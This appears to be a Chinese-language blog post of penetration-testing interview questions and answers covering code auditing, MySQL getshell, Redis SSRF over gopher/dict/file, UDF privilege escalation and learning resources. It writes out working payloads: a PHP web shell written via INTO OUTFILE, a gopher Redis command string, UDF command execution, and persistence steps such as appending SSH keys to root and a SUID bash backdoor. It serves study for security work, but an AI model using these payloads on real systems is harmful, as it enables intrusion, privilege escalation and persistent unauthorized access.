2025年滲透測試面試題總結-31（題目+回答）

安全領域各種資源，學習文檔，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具，歡迎關注。

一、代碼審計核心思路（261）

二、MySQL Getshell前提（262）

三、mysql.ini 關鍵配置（263）

四、Redis SSRF攻擊內網（264）

攻擊流程：

常用協議及用途：

五、UDF提權詳解（265）

原理流程：

實操步驟：

六、網絡安全學習資源（266）

推薦矩陣：

二百六十一、代碼審計的思路是什么二百六十二、mysql getshell的前提是什么二百六十三、其中需要mysql.ini 配置參數應該是怎樣二百六十四、redis ssf 如何攻擊內網，可以用到哪些協議二百六十五、說一下udf提權二百六十六、平常經常在哪些地方學習
一、代碼審計核心思路（261）
mermaidgraph LR A[信息收集] --> B[靜態分析] B --> C[動態驗證] C --> D[漏洞利用] D --> E[報告輸出]
四階段審計法
入口定位：掃描用戶輸入點（GET/POST參數、文件上傳、Cookie）
數據流追蹤：跟蹤外部輸入在代碼中的傳播路徑（如$_GET→SQL查詢）
危險函數檢測：
執行類：eval()/system()/exec()
文件類：file_put_contents()/move_uploaded_file()
反序列化：unserialize()

上下文驗證：確認過濾機制有效性（如htmlspecialchars()位置是否正確）

二、MySQL Getshell前提（262）

需同時滿足：

數據庫權限
FILE權限：SELECT user,file_priv FROM mysql.user
可通過GRANT FILE ON *.* TO 'user'@'%'獲取

路徑條件
已知Web絕對路徑（通過報錯/配置文件泄露）
secure_file_priv非NULL狀態（通過SHOW VARIABLES LIKE 'secure_file_priv'驗證）

寫入可行性
目標目錄MySQL進程可寫（Linux默認/tmp，WindowsC:\Windows\Temp）
非只讀文件系統
📌 關鍵命令：
sqlSELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php'; 
三、mysql.ini 關鍵配置（263）
ini# 允許文件導出（必須為空或指定目錄） secure_file_priv = "" # 開啟加載本地數據（非必須但推薦） local-infile = 1 # 設置插件目錄（UDF提權需用） plugin_dir = /usr/lib/mysql/plugin/ # 配置項驗證命令： SHOW VARIABLES LIKE 'secure_file_priv';
四、Redis SSRF攻擊內網（264）

攻擊流程：
mermaidsequenceDiagram Attacker->>+Vulnerable_Server： SSRF請求 Vulnerable_Server->>+Redis： Gopher協議指令 Redis-->>-Vulnerable_Server： 返回響應 Vulnerable_Server-->>-Attacker： 回顯結果 
常用協議及用途：

協議 攻擊場景 Payload示例
Gopher 發送任意Redis命令 gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$10%0d%0aevilcommand%0d%0a
Dict 端口掃描/服務探測 dict://192.168.1.1:80/info
HTTP 穿透WAF攻擊內網Web應用封裝Redis命令為HTTP POST
File 讀取服務器敏感文件 file:///etc/passwd

五、UDF提權詳解（265）

原理流程：
mermaidgraph TB A[上傳惡意.so/.dll] --> B[創建UDF函數] B --> C[調用函數執行命令] C --> D[獲取系統權限]
實操步驟：
環境檢測
確認MySQL版本：SELECT @@version
獲取插件路徑：SHOW VARIABLES LIKE 'plugin_dir'

上傳共享庫
利用SELECT ... INTO DUMPFILE寫入udf.so （需16進制轉換）
函數創建
sqlCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so'; SELECT sys_exec('chmod 4755 /usr/bin/bash');
權限維持
添加SSH密鑰：echo pub_key >> /root/.ssh/authorized_keys
創建SUID后門：chown root:root /bin/bash; chmod 4777 /bin/bash
六、網絡安全學習資源（266）

推薦矩陣：

類型 推薦平臺 核心價值
漏洞實驗室 Hack The Box、TryHackMe 真實滲透環境實戰
技術社區 Reddit r/netsec、先知社區前沿漏洞分析/工具分享
視頻課程 PentesterLab、OffensiveSec 手把手教學（含CVE復現）
博客追蹤 PortSwigger、Project Zero 深度技術解析（如0day分析）
CTF平臺 CTFtime、攻防世界競賽驅動技能提升
漏洞庫 Exploit-DB、CVE Details 最新漏洞PoC/影響分析
代碼倉庫 GitHub（關鍵詞：CVE/PoC）開源工具鏈（如sqlmap源碼研究）

協議	攻擊場景	Payload示例
Gopher	發送任意Redis命令	`gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$10%0d%0aevilcommand%0d%0a`
Dict	端口掃描/服務探測	`dict://192.168.1.1:80/info`
HTTP	穿透WAF攻擊內網Web應用	封裝Redis命令為HTTP POST
File	讀取服務器敏感文件	`file:///etc/passwd`

類型	推薦平臺	核心價值
漏洞實驗室	Hack The Box、TryHackMe	真實滲透環境實戰
技術社區	Reddit r/netsec、先知社區	前沿漏洞分析/工具分享
視頻課程	PentesterLab、OffensiveSec	手把手教學（含CVE復現）
博客追蹤	PortSwigger、Project Zero	深度技術解析（如0day分析）
CTF平臺	CTFtime、攻防世界	競賽驅動技能提升
漏洞庫	Exploit-DB、CVE Details	最新漏洞PoC/影響分析
代碼倉庫	GitHub（關鍵詞：CVE/PoC）	開源工具鏈（如sqlmap源碼研究）

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/pingmian/94177.shtml
繁體地址，請注明出處：http://hk.pswp.cn/pingmian/94177.shtml
英文地址，請注明出處：http://en.pswp.cn/pingmian/94177.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！